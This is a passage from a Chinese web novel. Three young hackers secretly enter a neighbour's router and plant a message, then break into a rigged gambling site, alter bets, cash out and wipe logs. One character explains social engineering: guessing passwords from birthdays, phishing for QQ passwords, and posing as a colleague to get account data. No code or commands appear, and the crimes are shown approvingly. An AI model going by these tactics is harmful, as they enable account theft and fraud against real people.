狼狈的三人走在夜晚的街道上,各自都有一肚子的问题,却都不愿意开口。

萧让很失意地说,我们是不是被发现了。另外两人不语,萧让明知故问。

危险漫步问林雨生用不用在田依的计算机里留下什么以纪念,林雨生想里想,决定留下一局话。《飞鸟与鱼》的开头:世界上最遥远的距离,不是生与死的距离,而是你站在我的面前,却不知道,我爱你。

田依的计算机一直处闲置状态,再者,这句话放计算机里显示,又不想表现得突兀,两全其美的办法几乎没有。危险漫步决定做成微博客户端的广告一样,在田依打开微博的时候,写有这句话的图片就会自动跳出来。出现的时长与每次上微博的广告时长一样,这样,既能留下这句话,又能避免田依发现自己的路由器被入侵。

但是,她既然主动问林雨生是否也喜欢《飞鸟与鱼》,就说明她十分清楚那句话就是林雨生他们留下的。

危险漫步:“那串wifi的密码,是她自己的生日。她故意和我们这样说,仿佛和我们明说,知道我们是利用路由器进入的。”

林雨生不解,为什么田依不采取某些行动,破坏他们的入侵。这个也是最困扰危险漫步的。整个入侵过程中,他并没有发现任何防御,一路上几乎通畅,唯一有意思的便是田依修改了路由器WEB管理里的默认账号密码,不过这除了再多5分钟的暴力时间,毫无意义。

难道她也是黑客?危险漫步还从未见过女黑客,对女黑客的形象还停留在黑客帝国里的凯莉·安妮·莫斯身上。可是危险漫步又隐约觉得她不是,觉得她与黑客间,并不是等号。这之间一定有什么误会。

哪里出问题里呢?危险漫步的眉头越拧越紧,不知不觉,三人就走到了大森林网吧。

林雨生这才想起来,萧让大半夜的拖他到网吧,还不知道为了什么。萧让说,危险漫步和他盯上一个博彩网站,准备过几天再动手,但是发生了突发状况,不得不提前行动。

林雨生知道有这样的一次行动,但是对具体的计划并不知晓。他很好奇,现在的博彩网站那么多,随意找一个攻击便是,为何偏偏选择一个既定目标,紧咬不放。

萧让摇头,林雨生对博彩及黑客的认知太过于片面,有时候会异想天开,有时候则思考的不够全面,最终带来各种各样偏离正确道路的弊端。

博彩在大陆是不合法的,大陆的博彩网站多半会挂上“美利坚合众国”,或者香港澳门这样的牌子。这类网站的确不少,但也并非多如牛毛,如危险漫步所想,一抓一大把。

其次,博彩网站的大小规模决定适不适合入侵,太小,难以有大动作——动作大会被发现。

大网站在规模上相对正规,加上自身的特殊性,安全系数相当高,若想人不知,除非己莫为。

中等的博彩站,又有上升期很下坡期两种,看起来,上升期潜力大,更为活跃;下坡期闷闷沉沉,说难听一点,更容易入侵。

其实刚好相反,在下坡期的网站运营时间更久,系统更为完善,即便瘦死,骨架还在,风吹草动很难不被发现。上升期博彩站靠赔率赢得大众青睐,虽然人数不少,管理者却正因人数日益增多焦头烂额,很难再有大量精力放在安全防护上。

危险漫步瞄准的网站(下称S站),人数以惊人的速度增长,他的优势在于低赔率,降低赔率,再拉上翻倍时候的利润,很快就受到了各种赌徒的青睐。

看上去,它是在用最老土的,薄利多销运营,其实不然。十赌九诈,S站这颗新星当然不是个乖乖仔,它凭借管理者对人性人心的洞悉,大敛不义之财。

管理员操纵牌数,先让多数玩家赚钱,随后再让他们输,输了两倍只好,再让他们赚,不过这些玩家赚回一半钱之后,腰包又得往外掏了。

控点的方法最先采用这种二分之一对半开式,管理员尝试不同的比数,计算出最好的点,静候蜂拥而来的赌徒。

危险漫步原计划是等下个月该网站“盛宴”时候下手,毕竟人多,可以浑水摸鱼,可是因为一个变动,他不得不提前行动。

网站的建立者腰包鼓了之后,打算金盆洗手,带着搏来的钱隐退,可是几个合伙人并不同意,他们争执不下,S站风雨飘摇。

网吧里的空气很浑浊,萧让轻咳一声,仿佛走进了战场。

见网管是个女生,危险漫步的脸上终于有了笑意,“楚虹,你没事休息休息不好么,这里气氛——嗯,空气很浑浊。”

楚虹咯咯咯地笑,说:“我没事当然会不会杵这里啊,但是走不开嘛。”

危险漫步:“你哥哥又乱指挥人了。” 

楚虹:“也不算啦,哥哥有时候忙我就帮他看一下咯。”

萧让:“别打情骂俏了,三张临时卡。”

楚虹脸一红,瞪了萧让一眼,“你不是够了么,干嘛还要临时卡。”

萧让:“最近老师查得严嘛!快点咯,飙两车回来就把危险漫步还给你。”

这次换危险漫步坐不住了,他迅速拿了纸条,走向僻静处。三人对着桌面发愣,危险漫步心跳加快,以前做的再多准备,在实际行动的时候,还是避免不了紧张。

设置完跳板后,轻车熟路,危险漫步很快就入侵进S站,他以前进入过多次,不过只是实验一下,挥一挥衣袖,不带走一片云彩。

萧让建议用两台机子坐小规模的违规以引起注意,再由危险漫步改单大捞一笔。想来想去,这个方案被危险漫步否决。它的确能起一定意义的调虎离山,但同时也会引起他们的警觉。

林雨生问:“那怎么办?” 

“最简单的方法即最有效的方法。速战速决。”

他们的时间只有一小时,超过一小时,跳板就有被别人跳的危险。危险漫步遇单改单的做法无疑告诉S站的人,他们被人入侵了。但是为了时间,这却也是最好的方法。

几十分钟后,危险漫步见左上角的数字开头变成五的时候,大叫一声林雨生,提现!

等了半天的林雨生双手迅速在键盘上活跃起来,很快,他喊了一句好,危险漫步把界面关闭,拿出之前已经准备好的清理工具。完成之后三人关闭计算器,望着漆黑的屏幕,紧迫的神经终于放松下来。

萧让惴惴不安:“真的不会被狩猎者追上么?”

危险漫步长出一口气,安慰道:“不会的,跳板的路由我设置了时间,日志清理完后,任何痕迹都没有。我不相信狩猎者可以通过这么短的时间破解我做的跳板。除非——外面现在警铃大作。”

“聊什么呢?”身后突然传来的声音把三人吓得从椅子上跳了起来,剧烈的反应也把说话的楚虹吓了一跳。四人面面相觑,危险漫步望着楚虹,支支吾吾地问,怎么了?

楚虹:“我哥回来了,现在没事咯,过来看看你们。这个是给你的。”她的手里拿着一杯牛奶,危险漫步小心翼翼地接过来,手却抖个不停。

还是温的。

危险漫步喝得很慢,时间仿佛在这一刻静止,他脑海里不断出现刚刚出现的S站,和身前楚虹娇美的美容。

“谢谢。”危险漫步说,他把杯子还给楚虹,楚虹手指着嘴唇,绕了几圈,危险漫步默然点头,把嘴边的沾着的牛奶擦去。

他觉得很累了,胜利的喜悦他还未来得及享受,却感受了无尽的虚无。

萧让轻佻的叫声让危险漫步感受到了一些现实的力量,可惜,这只是暂时的。

“喂,你偏心哎,我们明明有三个人,你却只拿来一杯。”

楚虹柳眉一竖,道:“要喝自己去前台拿。”萧让耸了耸肩,“果然长得帅的总是处处受排挤。”

危险漫步并不理会萧让,他轻轻地对楚虹说,先回去了,明天在来陪她。楚虹歪着头,笑眯眯地望着他,看得危险漫步心里一阵难受。往门口走进步,危险漫步又折回身,紧紧把楚虹抱住。一瞬间,眼泪掉了下来。

楚虹觉得今晚的危险漫步有些奇怪,她没有反抗,愣愣地由危险漫步抱住。

时针指向10,除了包夜的人,网吧的位子都是空着的。昏黄的灯光,烟雾缭绕。如果时间可以永恒,危险漫步心理,这一刻,绝对得算上。

室外空气冷冽而清新。门外左右皆停靠着各式各样的自行车。街上的霓虹寥寥,自动取款机和边上的自动贩卖机发出违和的光芒。

萧让提议现在就把钱取出来,免得夜长梦多。危险漫步默默点头,他就地坐下,痛苦地抱着头。周围一片寂静。

“狩猎者,是什么?”

林雨生的声音兀地响起,世界重归漆黑。 


第十四章  转角


萧让刚才说的狩猎者,指网络安全专家,或者称反追踪专家。他们的任务是追踪越线的黑客。螳螂捕蝉黄雀在后,狩猎者是黄雀,黑客则是螳螂。

黑客入侵手段多样,次数众多,很多计算机用户被黑客入侵了都不知道,这些这些入侵行动都是黑色的,因为众多难以排查,由黑渐变灰,由不法行为变成了“现象”。但是,当黑客做出出格的事后,就会被人通缉,最终落网。新闻常见某某黑客入侵银行、入侵某某账号落网,但不见新闻曝光某某黑客入侵同学电脑被抓。因为入侵银行及账号已经给他人造成确定的危害,不加以管制,社会不能长治久安。再入入侵国家军事类网站,涉及安全威胁,都是逮捕的目标。

这是网络世界的公共底线,逾越雷池,就等着被警察抓。

现实中,警察是抓犯人的好手,但在网络世界,很多警察就显得无能为力了。狩猎者就负责网络追踪,追踪不法黑客。因此, 很多狩猎者都受聘于大型公司做安全之类的职务,也有很多与政府挂钩。

狩猎者和白帽有很多相近的地方,但是狩猎者的技术一般要更硬些,他们不但做些安全检测、抓网络小偷等工作,很多超级黑客的落网,多和狩猎者的追踪有关。

因为这样,危险漫步断定他们绝不会被狩猎者追踪,好像抢来的钱又被抢了,不敢报警一样。

如果是大规模的博彩公司,就有一个像模像样的安全顾问,虽然能力差些,但也可以起到类似的作用。这是危险漫步对大规模博彩网站有所顾忌的原因。

萧让取钱回来,三人往公寓走。危险漫步刚把林雨生叫来的兴奋已经荡然无存,他现在反倒有些恐慌,恐慌萧让怀里并不烫手的山芋,恐慌自己的未来。

自哥哥死后,这种感觉还是第一次出现。很奇妙的感觉。

昏黄的路灯与枯枝交相掩映,脚下的路还很漫长。既来之,则安之吧。危险漫步忽然怀念起坐在哥哥身边的感觉。

走在楼梯上,望着狭窄的走廊,三人又想起去网吧前入侵田依路由器的失败,林雨生和萧让倒不觉得有什么,危险漫步的内心却更加灰暗。

萧让对林雨生说:“喜欢就去追,别闷在心里,难不成要等她追你?男孩子嘛,一定要勇敢一点,别像我以前那样——”

“以前哪样?”

田依的房门突然开了,萧让一愣,“就是相反呗,以前喜欢别人,又不敢开口,然后就没有然后了。女孩因该喜欢勇敢一点的男生吧,或者说,男生不主动,故事要怎么写下去呢?”

危险漫步掏出钥匙,“每个人都不同吧。像田大美女,就喜欢雨生这样的。不管雨生懦弱或勇敢,她都喜欢。你蹲在门口干嘛?这么久就一直等我们回来么?”

“不要自作多情了!没觉得我屋里黑灯瞎火的么?又停电了,我下楼找刘大爷。”

危险漫步啪地一下把灯打开,又回头望田依屋里黑漆漆一片,“大概是你房间跳闸了吧,叫雨生帮你推一下。”

白炽灯闪了一下,继而拭去房间里的黑暗。萧让相跟着走进屋,林雨生从电表间里出来,田依说:“谢谢。”

林雨生:“明天走一起看电影吧。”

田依:“没什么好电影的,而且,我不喜欢姐弟恋。”

林雨生:“但我想做那个例外。”

田依:“还真的没见你哪里懦弱呢。”

林雨生嘿嘿的笑,问田依喜欢什么类型的电影。田依撩了下头发,“无所谓类型,我喜欢剧情取胜。”又说:“我明天得上班,恐怕不行。”

林雨生并不死心,便要请她吃饭。田依再难拒绝,答应了他。

第二天是周六,危险漫步一早就去了大森林,林雨生在床上迟迟不肯起,萧让没什么事,准备去上课,又想上课更无聊,索性旷了。

QQ登上去,萧让正准备飙几把,右下角却出现好友上线提示

您的好友玩笑已上线。

开什么玩笑?萧让愣在那里,抽了自己一耳光,生疼。不可能吧?好几年没上线的人,怎么突然上线了?

萧让颤抖着点开聊天窗口,没等萧让开口,对方先开口道:“你好,最近好么?”

萧让巨汗。这种复古的打招呼方式,让他仿佛回到当年和玩笑聊天的时候。萧让有种错觉,玩笑像往常一样地和他聊天,他发出去消息,却传送到了几年之后的时空。

斧柯烂尽么,开什么玩笑。

萧让有些不知所措,对方的消息再次进来:“怎么不说话,你电脑在线的。”

萧让打了几个小点点发过去,又觉得冷淡,道:“还好,你呢?”

随便聊了几些,语句都比较生硬。萧让觉得对方的QQ可能换了一个人,他依稀记得以前玩笑和他聊天的时候,从来不会打标点,需要的地方皆以空格代替。但是现在,对面发来的消息都乖乖写了标点,并且用的相当严谨,甚至省略号,都不以“。。。”或者“...”代替。

一个人的某些小习惯是很难更改单,萧让确定对方不是原来的玩笑。

会是谁呢?盗号的?和危险漫步在一起待久了,一想到网络上的异常情况,第一反应就是计算机被入侵。

但是萧让又推翻了,玩笑的号自那年自己被迫下线之后,再也没有上线过,被盗的可能性很低。再者,它的号也没什么值得盗取的东西,利用社会工程学大费周章地窃取他的号没有意义。第三,该QQ为显示异地登陆,不过偶尔也会出现异地登陆但不显示的情况。萧让决定亲自验证一下。

以前玩笑曾有说过他是湖城人,萧让拿出测QQ登陆地址的工具,输入该号之后,地址很快跳了出来:湖城。

萧让很纳闷,难道真的是他?不会,不可能。萧让闭起眼睛,想象着如果是自己几年没登陆QQ,上线后找他会说什么?我会回来?

但肯定不是刚才他对他自己发的那样。你好二字绝对不该出现。意思一样,换作是玩笑,大概会说“还好么?最近怎么样?”

那么对方究竟是何方神圣。一瞬间,萧让突然想到了昨天一起入侵S站的事。该不会是S站的人吧?他们可以用肉鸡在湖城登陆,这样就算检测,检测的结果也是湖城而不是其他地方,萧让想着,额头上出现了豆大的汗珠。他迅速把电脑关掉,瘫坐在沙发上,无力感充斥全身。

房间里有细微的嗡嗡声,萧让的脸上的汗珠愈见细密。时钟悄无声息地行走,秒针划破一圈又一圈。

萧让摇摇晃晃地起来,走到窗边,拉开窗帘,刺眼的光线照进屋里,萧让眯着眼,觉得有些眩晕,瞬间天旋地转。

自来水流动的哗哗声,不知从什么时候开始一直没有停止。林雨生从卧室出来,看见萧让脑袋垂在水池里,吓了一跳。如果不是他肩膀上的轻微的起伏,林雨生还以为萧让被别人谋杀了。

萧让长长的头发垂到池底,顺着水流,好像要随他们流进下水道。他拿起毛巾,反复地在头发上摩挲,又坐回沙发上,会想整件事情的来龙去脉。

前几次“踩点”都不会有问题,肉鸡绝对安全。入侵的那一次摆明让对方发现的做法也的确有些冒失,但是如危险漫步所说,没有更好的方法。

最好有发现反向追踪链接。不过危险漫步已经提前一步把日志清理掉了。

如果是S站的人,那么只有一种解释:当时网吧有间谍黑客。间谍黑客倒来倒去,最后S站人通过社会工程学,找到了他们。

萧让喊了好几遍,林雨生才从房间里趿着拖鞋,慢吞吞地走出来。他的头发睡成了爆炸头,犀利地立在脑袋上。

林雨生的发质比较柴,又比较长,基本睡一觉换一个发型。他刚刚出来上厕所,回来似乎又睡下了。朦胧的睡眼,眼角还有一颗眼屎。

“怎么了?”林雨生问。

萧让见林雨生这副模样,没好气地说,“去去去,衣服穿好,别穿条裤头四处鬼晃。脸洗洗,有事和你说。”

萧让冲了杯咖啡,心情缓和很多。接着回想昨天发生的事。

在网吧里,唯一发现的接近他们的是楚虹。楚虹不会有问题,但是不敢保证她会不会被人套出什么话。

也不会。昨天临告别时,危险漫步交代过她,对任何人不要提起他们的事,如果有人问起,就说三个学生开了三个临时卡,其他什么都说不知道。

回公寓的路上也没有人跟踪,这一点他在路上很小心地留意过。如果对方能拿下一路的摄像头,是否能追踪到他的地址呢?

不可能。从网吧到公寓,摄像头零零碎碎,无法拼凑到一起。最后到家门口,遇到了田依。

对于萧让来说,田依是恐怖的存在。昨晚他们入侵路由器,以为一路凯歌,没想到却是在别人的眼皮底下行事。可是,从综合方面考虑,她不可能是S站的人。

现在登陆这个玩笑的人,究竟是何方神圣。难道真的是自己多虑了?

心烦意乱中,林雨生已经洗漱完毕走过来,头发湿漉漉的,眼睛里依旧没什么神采。

“什么事快说,这才几点,还想周末睡个懒觉的。”

萧让喝了口咖啡,让林雨生坐下,他问林雨生,是否知道什么是社会工程学。林雨生摇头。

社会工程学最早出现在超级黑客米特尼克的著作《欺骗的艺术》中,书里提的很简洁,初始目的在于让全世界的网民能够懂得网络安全,提高警惕,保护自身的安全。

在书中,凯文·米特尼克举了一个社会工程学的案例。1978年,斯坦利·马克·瑞福金利用职权之便进入电汇交易室,接着利用交易员的疏忽得到了电话转账交易的密码。他假扮称银行职员打电话给电汇室,让对方从纽约欧文信托公司贷1020万美元到瑞士苏黎世某家银行账户上。这个收录于吉尼斯世界纪录里的诈骗案没有使用暴力,没有繁冗的计划,没有得利的帮手,只有几个谎言。

现在广义社会工程学的定义为:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题。不过,在

更多的教条中,社会工程学被规划为黑客技术,他表现的形式有环境渗透,身份伪造,信件伪造,虚假电话及反向社会工程学等等。在黑客技术中,社会工程学通过劝导、蒙蔽、影响等方式,在被攻击者间建立一种虚假的信任关系,目的是为了达到获取信息。电话身份都是其非常重要的环节。

萧让娓娓而谈,听得林雨生云里雾里,不明觉厉。萧让要林雨生回答他,社会工程学是什么。

林雨生对刚刚听来的概念还处在一种懵懂的阶段,被危险漫步这么一问,隐约的概念消失得无影无踪,脑海里除了模糊的印象,再无其他。

林雨生支支吾吾地说:“社,社会工程学,骗人?”

萧让头猛地一垂,差点跌到了地上。“我不需要你急着总结出一个是否标准的概念,也不是要你死记硬背,查百科全书,第几页,社会工程学是什么。你的脑海里要有概念,他可以模糊,但你要大概清楚,这是什么。”

影片《我是谁:没有绝对的安全系统》中,马克斯从门外的垃圾桶里拿出一个带有小票的快餐盒,他把快餐盒堂而皇之地呈在快餐店的柜台上,告诉营业员少了两个巧克力甜圈。营业员说小票里没写巧克力甜甜圈,马克思说正是因为没写所以才少了。快餐店里人很多,营业员问马克思刚才是谁为他服务。

马克思毫不在意地指着一边的一个金发妹,并质问营业员,说或者可以把经理喊过来。

营业员脸色难看,犹疑一下,还是将两个巧克力甜圈放在了马克思的快餐盒里。

一旁的恩格尔目睹了全程,马克思称,人类天生就容易被蒙骗并且胆小怕事,只要脸皮够厚,世界将会出现在脚下。

影片中,马克思认为社会工程学是人类最伟大的幻象欺骗艺术,世界最大的漏洞,并不在于某程序或系统内,而在于人类本身。

萧让问林雨生有何感想。

林雨生:“我去试,真的不会被打么?”

萧让又一次卧倒,以前和这小子说话也没觉得饿这么累,今天怎么净来点三俗非主流式的回答。

萧让换一种方式问林雨生,如果一个QQ号一直不登陆,那么可能被盗么?

当然不会。林雨生一口咬定。

萧让说,“如果号主把密码告诉别人,然后登陆QQ——”林雨生打断道:“如果是号主自己把密码说出来,就不算盗。”

萧让:“如果被号主是在不知情或者被欺骗的情况下说出密码,算被盗号么?比如,我们装扮成号主的亲友,获得该密码,这算盗号么?我们来举一个,潜意识里的盗号方法。先说最简单的,钓鱼。我们利用工具就可以,对方输入密码,我们这里明文显示。知道对方密码之后,我们就可以登陆对方的QQ,最后完成盗号。或者直接入侵,查看对方日志,从而获取密码——当然这个太大费周章了一点。

“不管哪种,我们的要做的都是获得对方的QQ密码,利用利用社会工程学,也是为了完成这一愿望,从而达到获取密码的目的。如此看来,你再想一想,这算不算盗号呢?”

林雨生默然无言,萧让继续问,如果该号的持有者无法开口,也没没办法让他写出密码,没法发从他身上得到密码,该账户登录过的计算器已经被销毁,那么该QQ号可能被盗么?

不会。林雨生这次有些犹豫,但还是回答了不。

萧让:“我们通过他的信息,进行揣测,推试出密码。例如,小强的生日是1990年1月1日,我们就可以用19900101来作为试探。其实这也算是社会工程学。

“我们继续否定刚刚的可能性。已知小强的QQ号为123456,有办法盗号么?我们知道的就是他名字叫小强,和一个QQ,能试过的数字和字母都试了,都不正确。我们可以么?”

这一次,危险漫步的答案是可以。

萧让终于露出的笑容,“好的,那么该怎么做?”

林雨生面露难色,轻轻摇头:“我觉得可以,但是没有一个实际的方法。”

萧让:“这个谈话,也算社会工程学。最低级的诈骗,到高不可测的欺骗的艺术,之间的差距是什么?是思维。一个活跃的思维可以改变很多事,最低级的诈骗,走大街上向行人求一笔钱,急用,一小时就还。他们的失败在于,他们只认为一个谎言的极限就是如此,他能欺骗路人的极致,就是如此。

“让我们放松大脑,使不能变成可能。我们所有人的账户密码,都存于腾讯公司的数据库里,管理员一定有一项任务就是把其中的某部分数据交给A,A是他的同事。A的工作就是向管理员要数据,然后解决问题。我们是否可以假冒A,从数据里向管理员要出密码?

“为什么不可以?你内心的潜在台词是这都可以?那么我问你,为什么不行?回到上一个例子,假如你是开餐店的营业员,眼前出现一个无赖,向你要巧克力甜圈——你知道他是个无赖,你会给么?会不会。

“推理一下你的心理活动。前方顾客很多,后面你暗恋的,做蛋糕的妹子还在望着你,你希望这个无赖赶紧走,让他走的最好的方法是把巧克力甜圈给他。你的内心还是有一丝不想给的成分,他没有付钱,不给是对的,但是给了他你会有损失么?并不会。你想起你不止一次在后台偷吃,你想起做巧克力甜圈的脸上长了很多雀斑的女孩巧克力又放多了,顾客不会认账的,只能扔掉。你知道店里卖出100个甜圈,实际做的甜圈一定大于一百,一定会有消耗。老板理解有消耗,只要不过分,他不会责备你们的。

“无赖开始发难了,他指明要找经理。顾客的目光尖锐起来,他们看你的眼神变得很不一样,好像你才是那个错的家伙。你想起你前天刚打碎了一个杯子,因为小艾撞到你你才会把杯子打破的。但是很不幸,经理还是痛骂了你一顿,虽然你并不记恨小艾,但是这的确不公平,可是哪个变态又会欺负一个新入职瘦弱的女生呢?你只能自认倒霉。

“叫经理就叫经理吧。你可能这么想,但是一瞬间你又想到经理出来能做什么呢?经理是个和事佬,他出来除了拿起两个甜甜圈给无赖,还会臭骂你一顿,因为你打扰了他和情人的调情。你是对的,所以你要挨骂。你犹豫一下,还是将甜甜圈交给了无赖。他笑着对你道谢,可是你除了说不客气慢走,就是沉默,你毫无办法。因为你害怕,所以你把两个不属于无赖的甜甜圈交给他无赖,就像你害怕当无赖,害怕当无赖被打一样。”

林雨生歪着头,萧让对他说了一堆歪理,但是他除了承认歪理的正确,毫无选择。

 萧让耸了耸肩,“社会工程学。”

林雨生不语,萧让把咖啡喝完,突然想到了什么似的,道:“你昨天在网吧,我们教你注意四周动静,有没有人从边上监视我们,怎么样,有人么?”

林雨生摇头,萧让又问那楚虹过来的时候这么没注意。林雨生解释电脑关机之后,他就不再注意周围行动了。

萧让点头,看样子是自己多虑了。林雨生看了看时间,告诉萧让他准备出门了,还有事的话晚上再说。听说林雨生要约田依吃饭,萧让一愣,想这小子套路不少啊。想了想,吩咐林雨生问清楚田依这么知道入侵的事。

林雨生满口答应,其实萧让不问,他也会问清楚这到底是怎么一回事的。

萧让倚在窗边,目送林雨生离开。靠!这小子都有女生陪吃饭了,危险漫步也和楚虹约会去了,整个房间里只剩自己一人。萧让觉得很不是滋味,落寞地坐在电脑前。想起危险漫步,就想起还有件事没和他确认。

接电话的是楚虹。危险漫步的手机放楚虹的包了,他人现在正在洗手间。萧让长吁一声,问楚虹和危险漫步离开网吧是几点。

楚虹告诉萧让,危险漫步早上说有一些事情没处理,上了一段时间的网才陪她去逛街,出门的时候,大概十点多一些吧。

萧让接着问楚虹,早上有没有什么异常,得到楚虹一切正常的答案后,心里悬着的石头才放心落地。


 第十五章  玩笑


商场走廊上,一个女孩拎着几个购物袋,在两间店的中间地带徘徊。购物袋撑得满满的,女孩两只手把他们握在身前,看起来很是柔弱。商场熙熙攘攘,人声嘈杂。天花板的玻璃和地上淡黄色的瓷砖却把偌大的空间显得很冷。

你好,需要帮助么?

身后突然出现的奇怪的强调让女孩吓了一跳,她转过身,身后的人个子很高,黑色的外套拉链拉到最高,他的脸藏在衣服里,外加帽子拉得很低,看不起面容。

“吓死个人你!”女孩不满地叫道。他把购物袋一股脑地塞进那人的手中。

危险漫步把帽子摘下来,呵呵地笑。“你也真是不客气哎,这么多都让我拿。”

楚虹微微一笑,伸出小手,道:“呐,那我把你分担些。”

算了走吧。危险漫步不再嬉笑,他挺了挺身子,“楚大小姐,接下来,去哪里……”

“……”

两个人又逛了好一会儿,楚虹才想起刚才萧让有打电话的事。楚虹问危险漫步,要不要回过去问问。危险漫步想了想,说算了,重要的事老萧会让自己回的。

此刻萧让正郁闷地做在电脑前,颠来倒去,自己被追踪的嫌疑已经被排除,可是那个现在上玩笑号的人又是谁?不会真的是多年未联系的老友吧?这么久了,习惯改变了也不是没有可能。

算了,不去想了,人是铁饭是钢一顿不吃饿得慌。萧让尽量不去想玩笑的事,等危险漫步回来再一起商量怎么回事吧。

此刻林雨生正在万达广场里转悠,他找了很久都没有找到田依说的一语牛排,问了几个路人,又兜了几圈, 还是没找到。田依的电话进来,问他找到没有。

林雨生说没有。他很焦急地看着四周,多年以后他还是会记得那天早晨他窘迫的情形,四周都是过往的人群,却没有一个可以说上话的。周围接临的店铺,却没有一家是自己找的。五层的商业广场,林雨生迷失在着人群中。那时的他还是个路痴,还是个懦弱的少年,他并不知道自己有一天心无波澜的走过这里,一直以来,拥挤和嘈杂都是林雨生惧怕的对象。他也不知道,他喜欢的女生,此刻就在二楼,嘴角带着微笑注视着他。

电话里头传来田依的声音:“你是不是路痴啊,还没找到么?”

林雨生回没有,又问田依在哪儿里,田依说她已经在牛排里等很久了。

林雨生沉默不语,犹豫半天,说怎么办。

田依强忍笑意,道:“还能怎么办,回家吃吧,小朋友。” 

林雨生长吁一口气,顿在地上。人潮依旧不减。他清楚这是他自己的问题,但是心里充斥着的委屈却无法消减,也许正如萧让所说,他终究是个懦弱的人。

肩膀被人拍了一下,耳后传来熟悉的声音,“你怎么这么弱?你的朋友不是让你坚强一点的么?”

林雨生回过头,见田依正笑吟吟地看着自己。

林雨生有些不知所措,田依的脸上依然挂着灿烂的笑容,那一刻,林雨生感觉自己的一生都将融化在这个笑容里了。

萧让再次上线的时候,QQ显示有消息进来,都是玩笑的。

“在?”

“为什么不回我消息。”

“好吧。”

正在犹豫回什么的时候,QQ提示有邮件进来,发件者是玩笑。萧让的第一反应是木马,黑自己来着。刚才下去的汗珠又冒了出来,狐狸的尾巴终于露出来了。

萧让用虚拟空间打开该邮件,虚拟空间立马挂掉了,萧让吓得不轻,跑路的心都有了。打危险漫步电话,关机,打林雨生电话,无人接听。

焦躁。

窗帘呼啦一声被拉上,屋里一片昏暗。萧让坐回沙发上,享受一个风平浪静却惊心动魄的下午。

坐久了也会觉得无聊,可是内心的焦躁一点没少。恐惧难以持续,焦躁却可以长时间存在一个人的内心里。书架上黑客类的资料书籍,萧让翻阅几本,都没有耐心读下去。打开电脑,玩笑没再发来消息,企鹅默默地站在桌面的右下角,怀里抱着一只隐身标识。

别说书看不进去,萧让连游戏玩不下去,飙了几局,回回被对手欺负,车队里的伙伴见萧让这个样子,询问他发生了什么,是不是本人。萧让不语,只说是没手感,直到有一局跑出翻车这种糗事,才黯然退出游戏。

接触这款游戏三天之后,萧让再也没有翻过车。这款赛车游戏里,只有最新的新手才会犯这种低级错误。

红着脸和队友说再见,萧让愈发空虚起来,窗帘的一丝隙缝里,黄昏的阳光穿破屋里的暗淡,光柱里可见飘动的尘埃。萧让决定找些事做,打发这个焦躁的下午。半小时后,萧让的身影出现在公寓后方的山坡上。他依稀记得蹬上山顶后,太阳正敛进最后的余晖,山的另一边,整个天空都别云彩烧红,天际由赤红色,蔓延到金黄,蔓延成蔚蓝,蔓延倒另一边的暮色。

萧让瞭望这个城市的时候,内心不安的情愫终于消弭。纵横交错的公路被路灯保护着,汽车只有光点可见,它们在辽远的公路上穿梭,是光点与光线的交错。

所谓的黑客精神,对于萧让来说,学习再多知识,掌握再多技术也无法看得透彻的黑客精神,在这一刻终于了然于胸。

之于萧让,黑客精神便是无谓。如果做事总是畏手畏脚,那么终会一事无成。

太阳渐渐沉去,山间的风冷冽起来。萧让徘徊在山顶,一轮圆月冉冉升起。

这条无畏的路,自己又要走多久呢?下山的时候,萧让的心里一直在琢磨这个问题。他与黑客本不相关,他们之间也毫无束缚,只是一个计算机病毒改变了他的命运。这条偏离轨迹的路,又要走多久呢。深林杳寂,昨天入侵博彩站,并没有失误,可是此刻的内心却没有了兴奋。

人面对抉择的时候总是懦弱的,即便想摆脱命运束缚的萧让也不例外。母亲在父亲最需要她的时候离开,父亲的一夜白了头发,公司挺了过来,父亲却性情大变。哥哥的兵役结束,但他留在了部队。他很少回来,即便回来,家里冷冷清清,没什么话说。父亲的寡言,兄长的冷漠,萧让对这个家的内心只剩憎恶了。后来,常有同学惊羡慕他优裕的家庭,却不曾想过冬日的太阳是冰冷的温度。

即便放假,萧让也不再回家,学业保持中等,加上本地保护的政策,萧让轻松进入古店文远学院。很无趣的大学,他并不常去。获得试卷上的成绩有无数种,背书答题是最简单的一种。

跑上一万米和入侵一台计算机,入侵计算器只需要几分钟,跑一万米需要很多汗水,然而,一万米的难度要远低于入侵计算机的几分钟。现实即时如此,生活既是如此。

萧让的内心一片灰暗。

会到公寓的时候已经挺晚了,危险漫步手里拿着一本黑客技术方面的书,林雨生皱着眉头,手里捧着一本黑客基础。

司空见惯的场景。

危险漫步把书放下,招呼林雨生过来,道:“我们现在,开个小会。”

萧让一愣,这家伙今天抽的什么风,有时候一起商量事情,危险漫步从不会说开会这个词,他总说开会显得很啰嗦,繁琐。看样子,人总是会变的。

不过,既然他都这么说了,那就好好商议一下吧,萧让的心里有一肚子话要说,反观林雨生,倒是一脸无所谓的样子。 


第十六章  危险漫步


危险漫步:“我们三个人昨天入侵了一个博彩网站,入侵被发现在计划内,只要我们是谁不被发现,就是成功的。我们三个人第一桶金已经来了——这是我们三个第一次一起行动,我们一起给起个,呃,类似组织吧,给我们的组织起个名字,你们意下如何。”

林雨生和萧让没有意见,林雨生甚至把名字都想好了,LXL。取三人姓氏的英文开头。

危险漫步问萧让,萧让不语,心事重重的样子。危险漫步问林雨生,是否知道红客。

红客,意指具有爱国情怀、有很明显的政治倾向的黑客群体。它起源于世纪末的“五八事件”(1999年5月7日,北京时间5月8日,北约的美国B-2轰炸机发射使用三枚精确制导炸弹或联合直接攻击弹药(JDAM)击中了中华人民共和国驻南斯拉夫联盟大使馆,使馆毁坏严重,更造成了数十人的死亡。)。

后中国信息安全者苗得雨制作了第一个红客网站:中国红客之祖国团结阵线,后更名为中国红客之祖国统一战线。其中,红客一词取自于外媒的一篇报道“红旗下的黑客”。

红客活跃于很多重大的带有政治色彩的事件中,如2011年的南海问题,经一系列恶化之后,国内多家地方政府网站被越南黑客攻击。随后中国红客开启反击,数千家越南网站别挂上中国国旗。

红客经媒体炒作,经过多年变迁,已经不是原来的样子,回到本质,我们可以看清一个问题:情怀。

生来作为国家的子民,自带有爱国的情怀。危险漫步不是红客,他不会像红客一样,背着红旗四处插。但是他有情怀,他对国家有自己的定义。所以,当林雨生提议用LXL时,他内心瞬间否定这一词。倒不是这个不好,而是危险漫步想用中文。

情怀。

危险漫步提议用博客的名字,另外两人也未表反对。

危险漫步。

危险漫步还是不愿让汪青蓝过来。再等一等吧,我的朋友,危险漫步想,危险漫步的大门永远为你敞开。

